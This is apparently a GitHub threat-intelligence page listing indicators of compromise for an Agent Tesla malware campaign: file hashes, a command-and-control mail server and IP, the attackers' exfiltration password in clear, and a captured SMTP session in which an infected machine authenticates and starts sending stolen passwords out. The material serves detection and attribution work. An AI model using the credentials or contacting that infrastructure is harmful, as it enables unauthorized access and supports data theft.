-
Notifications
You must be signed in to change notification settings - Fork 84
/
2021-10-18 Agent Tesla IOCs
62 lines (53 loc) · 1.33 KB
/
2021-10-18 Agent Tesla IOCs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
THREAT ATTRIBUTION: AGENT TESLA
SUBJECTS OBSERVED
PO1
SENDERS OBSERVED
MALDOC FILE HASHES
PO9865.Z
b1d0cf2acaade9d59a6b88f78cad6720
AGENT TESLA PAYLOAD FILE HASHES
PO9865.exe
1a5ded5ec6d6e04a34d5af771deec2d9
klfiaac.pif
8e699954f6b5d64683412cc560938507
AGENT TESLA C2
us2.smtp.mailhostbox.com:587
208.91.199.223:587
EXFILTRATION CREDENTIALS
Username: [email protected]
Password: ypCvqu~Y33$}
SMTP EXFILTRATION
220 us2.outbound.mailhostbox.com ESMTP Postfix
EHLO WIN7PC
250-us2.outbound.mailhostbox.com
250-PIPELINING
250-SIZE 41648128
250-VRFY
250-ETRN
250-STARTTLS
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
AUTH login c2FsZXNAbmJjaXNudGVsLmNvbQ==
334 UGFzc3dvcmQ6
eXBDdnF1flkzMyR9
235 2.7.0 Authentication successful
MAIL FROM:<[email protected]>
250 2.1.0 Ok
RCPT TO:<[email protected]>
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
MIME-Version: 1.0
From: [email protected]
Date: 18 Oct 2021 09:41:30 -0400
Subject: PW_analyst/WIN7PC
Content-Type: multipart/mixed;
boundary=--boundary_0_6a4613de-c1e7-43ae-ad23-fed51905ddf2
SUPPORTING EVIDENCE
https://www.virustotal.com/gui/file/fecb550267c55c1443912a10c0d9851caf870b26dc3599a688eb148079d74950
https://www.virustotal.com/gui/file/c9a2399cc1ce6f71db9da2f16e6c025bf6cb0f4345b427f21449cf927d627a40